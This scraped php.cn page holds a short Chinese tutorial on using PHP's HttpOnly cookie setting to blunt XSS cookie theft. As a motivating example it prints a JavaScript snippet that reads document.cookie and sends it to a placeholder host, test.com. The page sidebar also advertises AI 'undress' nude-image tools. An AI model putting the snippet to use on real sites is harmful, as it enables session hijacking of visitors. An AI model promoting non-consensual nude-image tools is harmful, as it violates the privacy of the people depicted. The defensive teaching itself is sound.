xss防御之php利用httponly防xss攻击-php手册-php.cn

Home

php教程

php手册

xss防御之php利用httponly防xss攻击

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 08:23 PM

httponly xss attack

这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下

xss的概念就不用多说了，，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

复制代码代码如下:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

复制代码代码如下:

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

复制代码代码如下:

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution

3 weeks ago By DDD

What's New in Windows 11 KB5054979 & How to Fix Update Issues

2 weeks ago By DDD

Where to find the Crane Control Keycard in Atomfall

3 weeks ago By DDD

Assassin's Creed Shadows - How To Find The Blacksmith And Unlock Weapon And Armour Customisation

4 weeks ago By DDD

Roblox: Dead Rails - How To Complete Every Challenge

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7577

CakePHP Tutorial

1386

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

111

Related knowledge

How to protect against cross-site scripting (XSS) attacks using PHP Jun 29, 2023 am 10:46 AM

How to Use PHP to Defend Cross-Site Scripting (XSS) Attacks With the rapid development of the Internet, Cross-SiteScripting (XSS) attacks are one of the most common network security threats. XSS attacks mainly achieve the purpose of obtaining user sensitive information and stealing user accounts by injecting malicious scripts into web pages. To protect the security of user data, developers should take appropriate measures to defend against XSS attacks. This article will introduce some commonly used PHP technologies to defend against XSS attacks.

How do XSS vulnerabilities work? Feb 19, 2024 pm 07:31 PM

What is the principle of XSS attack? Specific code examples are needed. With the popularity and development of the Internet, the security of Web applications has gradually become the focus of attention. Among them, Cross-SiteScripting (XSS for short) is a common security vulnerability that web developers must pay attention to. XSS attacks are performed by injecting malicious script code into a Web page and executing it in the user's browser. This allows the attacker to control the user's browser and obtain the user's sensitive information.

How to set HttpOnly Cookie in Java? Apr 22, 2023 pm 06:37 PM

Httponlycookie is a cookie security solution. In browsers that support httponlycookie (IE6+, FF3.0+), if the "httponly" attribute is set in the cookie, the JavaScript script will not be able to read the cookie information, which can effectively prevent XSS attacks and make website applications more secure. However, J2EE4 and J2EE5 cookies do not provide a method to set the httponly attribute, so if you need to set the httponly attribute, you need to handle it yourself. importjavax.servlet.http.Cookie;importjavax.serv

How Codeql analyzes the problem of cookie not enabling httponly May 17, 2023 pm 05:25 PM

Preface Today we use codeql to analyze security issues such as "cookie is not enabled httponly", thereby deepening our use of codeql. If the response is good, you can consider exploring other vulnerabilities in Vulnerability-goapp. When analyzing go programs, you must additionally download the codeql-go description audit object Vulnerability-goapp: VulnerablegolangWebapplicationforeducation. Modification: Because all cookies in this project are not set to http-only, there is no comparison, so we need to modify it first. in some cookies

PHP data filtering: preventing XSS and CSRF attacks Jul 29, 2023 pm 03:33 PM

PHP Data Filtering: Preventing XSS and CSRF Attacks With the development of the Internet, network security has become one of the focuses of people's attention. In website development, it is very important to filter and verify user-submitted data, especially to prevent XSS (cross-site scripting attacks) and CSRF (cross-site request forgery attacks) attacks. This article will introduce how to use PHP to prevent these two common security vulnerabilities and provide some sample code for reference. Preventing XSS attacks XSS attacks refer to malicious attackers injecting malicious scripts or codes to tamper with

Cross-site scripting (XSS) attack prevention in Go: best practices and tips Jun 17, 2023 pm 12:46 PM

With the rapid development of the Internet, website security issues have become a major problem in the online world. Cross-site scripting (XSS) attack is a common security vulnerability that exploits website weaknesses to inject malicious scripts into web pages to steal and tamper with user information. As an efficient and safe programming language, Go language provides us with powerful tools and techniques to prevent XSS attacks. This article will introduce some best practices and techniques to help Go language developers effectively prevent and resolve XSS attacks. for all inputs

Learn security precautions: Use PHP to avoid XSS attacks Jun 22, 2023 am 08:48 AM

In the Internet era, with the continuous popularity and development of Web applications, injection and cross-site scripting attacks (XSS) have become a focus of security prevention work. Among them, XSS attacks are carried out by attackers by inserting malicious scripts into Web pages. PHP, as a server-side scripting language, is widely used in Web development. How to use PHP to avoid XSS attacks has become a must for developers. Right question. First, understanding how XSS attacks are implemented is crucial to preventing XSS attacks. XSS

Common network security issues and solutions in Java development Oct 09, 2023 pm 06:36 PM

Summary of common network security issues and solutions in Java development: With the popularization of the Internet, network security issues have become increasingly prominent. During Java development, we need to consider how to protect the security of network communications. This article will introduce some common network security problems and provide corresponding solutions and code examples. 1. Cross-site scripting attack (XSS) XSS attack refers to an attack method that obtains user sensitive information by injecting malicious scripts into web pages. To prevent XSS attacks, we can use regular input checking

See all articles